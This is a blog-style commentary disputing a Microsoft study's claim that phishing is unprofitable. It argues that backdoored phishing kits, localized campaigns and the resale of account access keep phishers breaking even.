Microsoft study debunks phishing profitability
Citing a 1968 published article "Tragedy of the Commons" the researchers argue that due to the fact that so many phishers operate on the same scam-scene, they earn less than the could possibly do. Moreover, according to the research the enormous volume of phishing emails is in fact an indication of the failure of phishing. Naturally, they are many more factors to consider, in particular, are phishers in fact profit-maximization machines or are they willing to sacrifice potential profit for the sake of their own security? Is it all about making big money, or about breaking-even in general?
"However, as we will show, the economics of phishing are far far worse than this. Rather than sharing a fixed pool of dollars phishing is subject to the tragedy of the commons ; i.e. the pool of dollars shrinks as a result of the efforts of the phishers. A community (all phishers) share a finite resource (the pool of phishable dollars) that has limited ability to regenerate (dollars once phished are not available to other phishers). The tragedy of the commons is that the rational course of action for each individual (phisher) leads to over-exploitation and degradation of the resource (the phishable dollars)."
Using the Tragedy of the Commons analogy in this case makes it sound as every phished person's disposable income to which phishers would eventually have access to is universally the same. Logically, that's not the case, since a single phished person could prove to be a more profitable catch for a phisher than a hundred phished people, and the number of potentially phishable people is always increasing with more people going online.
Moreover, perhaps not so economic models minded phishers are constantly looking for ways to achieve better efficiency, lower costs, and ways to eat other phishers lunch - by scamming their fellow colleagues. For instance, a related research published in August, 2008, found evidence that phishers are in fact backdooring phishing pages and then distributing them for free so that they can have other phishers do the scam for them. The same backdooring process, even though no properly analyzed in a study, continues to take place at a more advanced and far more profitable level - backdooring web malware exploitation kits and botnet command and control interfaces. Therefore, of the hundred actively participating phishers, eighty could be easily phishing for the other twenty.
- Go through related phishing tactics - DIY phishing kits introducing new features; Phishers apply quality assurance, start validating credit card numbers; Lack of phishing attacks data sharing puts $300M at stake annually
There are even more variables to consider. Take internal competition among different phishers. Just because a phisher has just sent a million phishing emails pretending to be from a leading German bank to a million Chinese users, perhaps not knowing that the spamming database he's using belongs to Chinese citizens, doesn't mean that the outcome of his campaign would be similar to a fellow phisher that's taken basic localization and targeting steps into account. With localization of cybecrime taking place as of early 2008, outsourcing the translation process of a particular phishing campaign/email is opening up an entire new space for phishers to more effectively target potential victims. The bottom line here is that the second phisher has a higher chance for success even though they're attempting to phish the same Chinese users, since he'd be impersonating a local bank and his phishing creatives would be speaking native language.
This is where efficiency and scalability comes into play, a situation pretty similar to that of spam. As long as even a small number of people out of a million phishing emails sent become victims, the phishers would break-even and thus, continue expanding the number of emails sent. This shouldn't be taken as a failure of phishing in general, instead, it should be considered as a campaign optimization practice attempting to achieve better results by targeting a larger population.
There's another issue to consider and that is how much money is a phisher actually looking to make out of his phishing campaigns, and is there in fact a maximum or a minimum to his ambitions? Even though access to someone's account is obtained, is the phisher actually able to withdraw the money from the account, or is he in fact going to be making money from selling access to the phished account to someone who can do it, thus, monetizing the accounting data instead of using it? Evidence gathered on this practice clearly indicates that novice phishers may in fact never obtain any of the money that they have access it, but again make money out of selling the access to a particular account to those who can.
Phishers may not be making the money that they used to a couple of years ago, but then again phishing has long stopped being an exclusive cybercrime practice - it's turned into a cybercrime practice "in between" with the phishers breaking-even given the lowering costs and entry barriers into the phishing space in general. And as long as they break-even, millions of phishing emails would continue circulating, again "in between" the rest of their malicious activities.